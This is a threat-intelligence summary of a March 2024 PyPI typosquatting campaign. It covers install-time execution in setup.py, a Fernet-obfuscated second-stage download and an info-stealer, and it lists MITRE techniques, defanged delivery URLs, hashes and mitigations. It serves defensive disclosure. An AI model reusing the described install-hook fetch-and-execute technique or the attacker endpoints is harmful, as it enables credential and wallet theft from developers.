Keypoints
- PyPI suspended new project creation and new user registration to mitigate an ongoing malware upload campaign.
- Checkmarx identified multiple typosquatting packages uploaded between Mar 27–28, 2024, likely created by automation.
- Malicious code was embedded in each package’s setup.py so it executed automatically when the package was installed.
- setup.py contained obfuscated code encrypted with the Fernet module; it decrypted and executed a secondary payload fetched from a remote server.
- The secondary payload was an extensive info‑stealer aimed at browser cookies, extension data, crypto wallets, and stored credentials.
- The malware implemented persistence to survive reboots and remain active after initial execution.
- PyPI removed many suspicious package projects (large list of typosquatting names) and published IOCs including funcaptcha.ru URLs and file hashes.
MITRE Techniques
- [T1195] Supply Chain Compromise – Attackers uploaded malicious packages to a public package repository to supply malware via dependent installs (‘Between March 27 and March 28, 2024, multiple malicious Python packages were uploaded on the Python Package Index (PyPI).’)
- [T1204] User Execution – The malicious code executed automatically during package installation through setup.py, causing users to run the payload by installing the package (‘The malicious code is located within each package’s setup.py file, enabling automatic execution upon installation.’)
- [T1027] Obfuscated Files or Information – The installers contained obfuscated/encrypted code using the Fernet module to hide malicious logic (‘the setup.py file contained obfuscated code that was encrypted using the Fernet encryption module’)
- [T1105] Ingress Tool Transfer – setup.py dynamically constructed a URL and retrieved an additional encrypted payload from a remote server to deliver the main info‑stealer (‘attempted to retrieve an additional payload from a remote server. The URL for the payload was dynamically constructed by appending the package name as a query parameter.’)
- [T1539] Steal Web Session Cookie – The deployed info‑stealer targeted browser cookies and extension data to harvest sessions and credentials (‘aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc..) and various credentials.’)
- [T1547] Boot or Logon Autostart Execution – The malware implemented a persistence mechanism to ensure it remained active after reboots (‘the malicious payload employed a persistence mechanism to survive reboots.’)
Indicators of Compromise
- [Domain/URL] Malicious payload delivery endpoints – hxxps://funcaptcha[.]ru/paste2, hxxps://funcaptcha.ru/atomic/app.asar (and other funcaptcha.ru paths)
- [File name] Retrieved payload / component – app.asar referenced as a delivered artifact (funcaptcha.ru/atomic/app.asar)
- [File hashes] Example payload hashes – ABE19B0964DAF24CD82C6DB59212FD7A61C4C8335DD4A32B8E55C7C05C17220D, 0C1DDD33E630F4AC684880F0E673DFA84919272494C11DA0F1EC05FB4F919CE8
- [Package names] Typosquatting packages uploaded to PyPI – requiremetstx, customtkinter (many variants), tensorflow/tensorflow variants (and hundreds of other misspelled package names)
Checkmarx observed an automated typosquatting campaign that uploaded hundreds of look‑alike package names to PyPI over March 27–28, 2024. Each malicious package embedded its payload in setup.py so installation triggered execution: the installer contained Fernet‑encrypted, obfuscated code which the install process decrypted and ran. The setup script then built a URL using the package name and fetched a second Fernet‑encrypted payload from a remote server (examples reference funcaptcha.ru paths), decrypted that payload, and executed an extensive info‑stealer module.
The delivered info‑stealer was designed to harvest browser data (cookies, extension storage), various stored credentials, and crypto wallet information. To maintain access the malware implemented persistence to survive reboots. PyPI removed the flagged projects (a long list of misspelled package names) and published IOCs including funcaptcha.ru delivery URLs and the identified file hashes for detection and blocking.
Technical mitigations include blocking the listed domains/URLs at the network edge, scanning installed packages for setup.py that execute code at install time, validating packages against known good names, and checking endpoints and hashes indicated in the IOCs. Administrators should audit recent pip installs, remove any suspicious packages, verify persistence artifacts, and rotate any potentially exposed credentials or wallets.
Read more: https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/